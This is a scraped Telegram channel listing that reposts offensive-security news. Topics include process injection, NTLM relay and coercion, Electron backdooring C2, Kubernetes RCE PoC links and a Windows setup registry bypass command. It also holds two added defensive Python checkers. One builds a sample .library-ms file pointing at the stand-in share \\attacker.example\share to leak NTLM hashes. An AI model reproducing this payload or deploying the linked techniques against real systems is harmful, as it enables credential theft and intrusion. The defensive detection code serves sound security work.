
1N73LL1G3NC3
Reborn…
Type: Public
Verification: Not verified
Trust: Not trusted
Language: Other
Channel creation date: Dec 16, 2024
Added to TGlist: Feb 06, 2025

Latest posts in group "1N73LL1G3NC3"
Reposted from:
Offensive Twitter

15.04.2025 08:03
😈 [ Check Point Research @_CPResearch_ ]
Thread Execution Hijacking is one of the well-known methods that can be used to run implanted code.
In this blog we introduce a new injection method, that is based on this classic technique, but much stealthier - Waiting Thread Hijacking.
Blog:
🔗 https://research.checkpoint.com/2025/waiting-thread-hijacking/
Code:
🔗 https://github.com/hasherezade/waiting_thread_hijacking
🐥 [ tweet ]
Reposted from:
Ralf Hacker Channel

14.04.2025 18:02
NTLM relay into WinRMS, didn't expect that? Well, here it is...
Blog: https://sensepost.com/blog/2025/is-tls-more-secure-the-winrms-case./
Soft: https://github.com/fortra/impacket/pull/1947
#pentest #redteam #relay #ad #lateralmovement


Reposted from:
Волосатый бублик

08.04.2025 14:55
[ RemoteMonologue: Weaponizing DCOM for NTLM authentication coercions ]
A Windows credential harvesting attack that leverages the Interactive User RunAs key and coerces NTLM authentications via DCOM. Remotely compromise users without moving laterally or touching LSASS.
Blog: https://www.ibm.com/think/x-force/remotemonologue-weaponizing-dcom-ntlm-authentication-coercions
Tool: https://github.com/xforcered/RemoteMonologue


03.04.2025 20:58
Loki
Node JS C2 for backdooring vulnerable Electron applications to bypass application controls. This technique abuses the trust of signed vulnerable Electron applications to gain execution on a target system.
Since Electron applications execute JavaScript at runtime, modifying these JavaScript files allows attackers to inject arbitrary Node.js code into the Electron process. By leveraging Node.js and Chromium APIs, JavaScript code can interact with the operating system.
Loki was designed to backdoor Electron applications by replacing the application's JavaScript files with the Loki Command & Control JavaScript files.
Blog: Bypassing Windows Defender Application Control with Loki C2
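A practical check for the technique described in this post, added here as an example and not code from the post or from the Loki project: the Electron binary's Authenticode signature covers the executable, not the JavaScript (or app.asar) under its resources directory that it loads at runtime, so the detection is a hash manifest of those files taken from a known-good install and re-checked later. The directory layout, file names (main.js, c2.js) and file contents below are constructed for the example.

```python
"""Baseline and re-verify the JavaScript of an Electron app's resources tree.

Added example (not part of the original post or the Loki project). The tree,
the file names and the 'tampering' performed in demo() are all constructed.
"""
import hashlib
import os
import tempfile

# Files Electron loads or consults at runtime that a code-signing check does not cover.
WATCHED_SUFFIXES = (".js", ".mjs", ".cjs", ".json", ".asar")


def hash_file(path: str) -> str:
    """SHA-256 of a file, streamed so large app.asar bundles are handled."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root: str) -> dict[str, str]:
    """Map relative path -> SHA-256 for every watched file below root."""
    manifest = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(WATCHED_SUFFIXES):
                full = os.path.join(dirpath, name)
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                manifest[rel] = hash_file(full)
    return manifest


def verify(root: str, baseline: dict[str, str]) -> dict[str, list[str]]:
    """Diff the current tree against the baseline: modified, added and missing files."""
    current = build_manifest(root)
    return {
        "modified": sorted(p for p in baseline if p in current and current[p] != baseline[p]),
        "added": sorted(p for p in current if p not in baseline),
        "missing": sorted(p for p in baseline if p not in current),
    }


def demo() -> dict[str, list[str]]:
    """Constructed scenario: baseline a tiny app, then replace main.js and drop a loader file."""
    with tempfile.TemporaryDirectory() as root:
        app = os.path.join(root, "resources", "app")
        os.makedirs(app)
        with open(os.path.join(app, "main.js"), "w") as f:
            f.write("const { app } = require('electron');\napp.whenReady().then(() => {});\n")
        with open(os.path.join(app, "package.json"), "w") as f:
            f.write('{"main": "main.js"}\n')
        baseline = build_manifest(root)

        # Simulated tampering in the style the post describes: the app's own JS is
        # swapped for a stub that pulls in injected Node.js code (constructed content).
        with open(os.path.join(app, "main.js"), "w") as f:
            f.write("require('./c2.js');\n")
        with open(os.path.join(app, "c2.js"), "w") as f:
            f.write("// constructed placeholder for injected code\n")
        return verify(root, baseline)


if __name__ == "__main__":
    for kind, paths in demo().items():
        for p in paths:
            print(f"[{kind}] {p}")
```

The manifest has to come from a trusted install (or the vendor's package), and it only detects after the fact; the durable fix on the application side is to ship with Electron's fuses EnableEmbeddedAsarIntegrityValidation and OnlyLoadAppFromAsar enabled so the runtime itself refuses a modified bundle.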


30.03.2025 14:02
30.03.2025 10:50
💻 Windows 11 is not killing off hack that lets you bypass Microsoft account, but it takes more effort now
"We’re removing the bypassnro.cmd script to enhance security and user experience of Windows 11. This change ensures that all users exit setup with internet connectivity and a Microsoft Account," Microsoft noted in a blog post.
You just need to create a new Registry value by following these steps, to bypass it:
• On the “Let’s connect you to a network” screen, press Shift + F10 to open Command Prompt.
• Type regedit to open the Registry Editor.
• In Registry Editor, navigate to: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OOBE
• Right-click on the blank space in the right panel and select:
• New > DWORD (32-bit) Value
• Name it exactly: BypassNRO
• Double-click BypassNRO, and set the value data to 1.
• Close Registry Editor.
• Restart.
Or you can just open Command Prompt and run the following script:
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\OOBE" /v BypassNRO /t REG_DWORD /d 1 /f
shutdown /r /t 0
If you followed the steps correctly, you will see the “I don’t have internet” option again.

Reposted from:
Offensive Twitter

27.03.2025 13:11
😈 [ Craig Rowland - Agentless Linux Security @CraigHRowland ]
This new Linux script from THC will encrypt and obfuscate any executable or script to hide from on-disk detection:
🔗 https://github.com/hackerschoice/bincrypter
I'm going to show you how to detect it with command line tools in this thread:
🔗 https://threadreaderapp.com/thread/1905052948935377402.html
🐥 [ tweet ]


Reposted from:
Ralf Hacker Channel

26.03.2025 08:19
Yesterday IngressNightmare made a lot of noise: unauthenticated RCE in the Ingress NGINX Controller, which can lead to a full Kubernetes cluster takeover.
Patched: Feb 7, 2025
Blog: https://www.wiz.io/blog/ingress-nginx-kubernetes-vulnerabilities
PoC: https://github.com/sandumjacob/IngressNightmare-POCs
Does research published without PoC code disappoint you too??
#rce #kuber #pentest #exploit
25.03.2025 22:04
ForsHops
Fileless lateral movement with trapped COM objects
Blog: https://www.ibm.com/think/news/fileless-lateral-movement-trapped-com-objects


25.03.2025 12:43
🐎 Red Teaming with ServiceNow
This blog post aims to highlight how access to ServiceNow can be abused to perform a range of attacks, of which 5 are described below:
• Attack 1 – Custom Actions [Code Execution, Credential Retrieval]
• Attack 2 – Discovery [Credential Capture, Code Execution]
• Attack 3 – Orchestration [Relaying, Code Execution, Active Directory Modification]
• Attack 4 – LDAP Listener [Credential Capture]
• Attack 5 – Relaying [Credential Capture, Execution, Active Directory Modification]


21.03.2025 10:16


18.03.2025 16:26
CVE-2025-24071: NTLM Hash Leak via RAR/ZIP Extraction and .library-ms File
When a specially crafted .library-ms file containing an SMB path is compressed within a RAR/ZIP archive and subsequently extracted, Windows Explorer automatically parses the contents of this file due to its built-in indexing and preview mechanism. This behavior occurs because Windows Explorer processes certain file types automatically upon extraction to generate previews, thumbnails, or index metadata, even if the file is never explicitly opened or clicked by the user.
Blog: https://cti.monster/blog/2025/03/18/CVE-2025-24071.html
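A detection check for the behaviour described above, added here as an example and not taken from the post or the cti.monster write-up: it opens a ZIP archive, pulls out every .library-ms entry, parses the Library Description XML and reports any simpleLocation url that is a UNC path, since that is the location Explorer resolves over SMB when it indexes or previews the extracted library. The archive, the entry names and the host attacker.example are constructed for the example; RAR archives would need a third-party reader and are not handled here.

```python
"""Flag .library-ms entries inside a ZIP whose location points at a UNC (SMB) path.

Added detection example (not part of the original post or advisory). The sample
archive, its file names and the share \\attacker.example\share are constructed.
"""
import io
import re
import xml.etree.ElementTree as ET
import zipfile

# Namespace of Windows Library Description (.library-ms) files.
LIB_NS = "http://schemas.microsoft.com/windows/2009/library"

# A UNC path: \\host\share... (two backslashes, a host, another backslash).
UNC_RE = re.compile(r"^\\\\[^\\]+\\")


def unc_targets_in_library(xml_bytes: bytes) -> list[str]:
    """Return every <url> in a .library-ms document that is a UNC path.

    Explorer resolves these simpleLocation targets when it indexes or previews
    the library, which is the outbound SMB connection the post describes.
    Unparseable input is treated as 'no findings' rather than an error.
    """
    try:
        root = ET.fromstring(xml_bytes)
    except ET.ParseError:
        return []
    hits = []
    for el in root.iter():
        tag = el.tag.split("}")[-1]  # tolerate namespaced and bare elements
        if tag == "url" and el.text and UNC_RE.match(el.text.strip()):
            hits.append(el.text.strip())
    return hits


def scan_archive(data: bytes) -> dict[str, list[str]]:
    """Map each .library-ms entry in a ZIP (given as bytes) to the UNC targets it carries."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir() or not info.filename.lower().endswith(".library-ms"):
                continue
            targets = unc_targets_in_library(zf.read(info))
            if targets:
                findings[info.filename] = targets
    return findings


def build_sample_archive() -> bytes:
    """Constructed sample: a text file, a benign library and one pointing at an SMB share."""
    malicious = f"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="{LIB_NS}">
  <name>@shell32.dll,-34575</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <iconReference>imageres.dll,-1003</iconReference>
  <templateInfo>
    <folderType>{{7d49d726-3c21-4f05-99aa-fdc2c9474656}}</folderType>
  </templateInfo>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <isSupported>false</isSupported>
      <simpleLocation>
        <url>\\\\attacker.example\\share</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""
    benign = f"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="{LIB_NS}">
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>knownfolder:{{FDD39AD0-238F-46AF-ADB4-6C85480369C7}}</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("readme.txt", "nothing to see here")
        zf.writestr("Documents.library-ms", benign)
        zf.writestr("Invoice.library-ms", malicious)
    return buf.getvalue()


if __name__ == "__main__":
    for name, targets in scan_archive(build_sample_archive()).items():
        print(f"[!] {name}: UNC location(s) {targets}")
```

Run it over mail attachments or a download quarantine before they reach a user's Explorer session; on the network side, the same leak is blunted by blocking outbound SMB (TCP 445) to untrusted hosts, which is worth having regardless of this CVE.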
18.03.2025 11:34
CVE-2025-0927 LPE
HFS+ file system implementation in the Linux Kernel contains a heap overflow vulnerability that achieves local privilege escalation on Ubuntu 22.04 for active user sessions.
Affected Versions:
• Linux Kernel, up to 6.12.0
• Ubuntu 22.04 with Linux Kernel 6.5.0-18-generic
11.03.2025 07:03
GOAD - part 14 - ADCS 5/7/9/10/11/13/14/15
P.S. In the previous blog post on ADCS (Goad Pwning Part 6), ESC1, ESC2, ESC3, ESC4, ESC6, and ESC8 were exploited.


Records
Subscribers: 3.3K (16.04.2025 23:59)
Citation index: 100 (05.02.2025 15:16)
Average views per post: 1.4K (04.03.2025 16:12)
Average views per ad post: 1.4K (10.03.2025 16:12)
ER: 11.41% (09.04.2025 23:59)
ERR: 56.94% (11.02.2025 16:12)